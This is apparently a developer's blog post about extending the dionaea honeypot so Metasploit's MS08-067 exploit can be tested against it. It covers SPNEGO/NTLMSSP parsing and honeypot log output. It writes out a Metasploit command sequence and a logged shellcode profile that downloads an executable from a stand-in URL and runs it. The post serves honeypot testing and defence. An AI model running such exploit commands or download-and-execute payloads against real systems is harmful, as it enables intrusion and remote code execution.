Current dionaea trunk is metasploitable.
Getting this working was pretty nasty:
Basically the decoded SecurityBlob of a Session Setup AndX Request looks like this:
###[ GSSAPI ]### oid= <ASN1_OID['.1.3.6.1.5.5.2']> ###[ SPNEGO ]### \NegotiationToken\ |###[ NegTokenInit ]### \MechTypes\ |###[ MechType ]### | oid= <ASN1_OID['.1.3.6.1.4.1.311.2.2.10']> mechToken= <ASN1_STRING['NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08`\t\x00\t\x00 \x00\x00\x00\x06\x00\x06\x00)\x00\x00\x00WORKGROUPHOSTXX']> \###[ NTLMSSP Header sizeof(12) ]### Signature = b'NTLMSSP\x00' sizeof( 8) off= 0 goff= 0 MessageType = Negotiate sizeof( 4) off= 8 goff= 8 ###[ NTLM Negotiate sizeof(99) ]### NegotiateFlags = NEGOTIATE_UNICODE+....+NEGOTIATE_KEY_EXCH sizeof( 4) off= 0 goff= 12 \DomainNameFields\ |###[ NTLM Value sizeof(8) ]### | Len = 9 sizeof( 2) off= 0 goff= 16 | MaxLen = 9 sizeof( 2) off= 2 goff= 18 | Offset = 32 sizeof( 4) off= 4 goff= 20 \WorkStationFields\ |###[ NTLM Value sizeof(8) ]### | Len = 6 sizeof( 2) off= 0 goff= 24 | MaxLen = 6 sizeof( 2) off= 2 goff= 26 | Offset = 41 sizeof( 4) off= 4 goff= 28 Payload = b'WORKGROUPHOSTXX' sizeof( 15) off= 20 goff= 32
To get this working, I had to get an ASN1 parser for python3, after beeing able to parse basics with scapys ASN1 parser, I decided to port the required parts of scapys ASN1 parsing to python3.
Afterwards I had to declare the ASN1 structures, so scapy could parse the GSS-API and SPNEGO data properly, this procedure was pretty counterintuitive and scapy docs did not really help.
Once scapy could deal with GSS-API and SPNEGO, I had to declare the NTLMSSP structures, which was really easy, compared to the ASN1 structures.
Then there were some obscure bytes … which turned out to be the ber encoded indentifier followed by the ber encoded length.
The required logic was added, and now it basically works.
When I initially starred at this authentication scheme, I was pretty lost, so I'm totally glad I got over here.
use exploit/windows/smb/ms08_067_netapi set RHOST 127.0.0.1 set PAYLOAD windows/download_exec set URL http://example.com/test.exe exploit # [*] Automatically detecting the target... # [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown # [*] Selected Target: Windows XP SP0/SP1 Universal # [*] Attempting to trigger the vulnerability... # [*] Exploit completed, but no session was created.
And, thats what it looks like in dionaea's logsqlite:
2010-06-30 06:32:41
connection 22029 smbd tcp accept ::ffff:127.0.0.1:445 <- ::ffff:127.0.0.1:58411
dcerpc bind: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) transfersyntax
...
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
...
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 34 (None (None))
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 28 (None (None))
dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 0 (None (None))
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
profile: [{'return': '0x7c814eea', 'args': ['', 'GetSystemDirectoryA'], 'call': 'GetProcAddress'}, {'return': '0x7c86136d', 'args': ['', 'WinExec'], 'call': 'GetProcAddress'}, {'return': '0x7c80c058', 'args': ['', 'ExitThread'], 'call': 'GetProcAddress'}, {'return': '0x7c801d77', 'args': ['', 'LoadLibraryA'], 'call': 'GetProcAddress'}, {'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0x7df7b0bb', 'args': ['', 'URLDownloadToFileA'], 'call': 'GetProcAddress'}, {'return': '19', 'args': ['c:\\WINDOWS\\system32', '32'], 'call': 'GetSystemDirectory'}, {'return': '0', 'args': ['', 'http://example.com/test.exe', 'c:\\WINDOWS\\system32\\a.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['c:\\WINDOWS\\system32\\a.exe', '0'], 'call': 'WinExec'}, {'return': '0', 'args': ['32'], 'call': 'ExitThread'}]
It is not perfect yet, but it works.
The calls metasploit does for fingerprinting could be implemented, metasploit changed their shellcodes, so many shellcodes can be detected using libemu, but not profiled, as some dll management memory segments are missing.
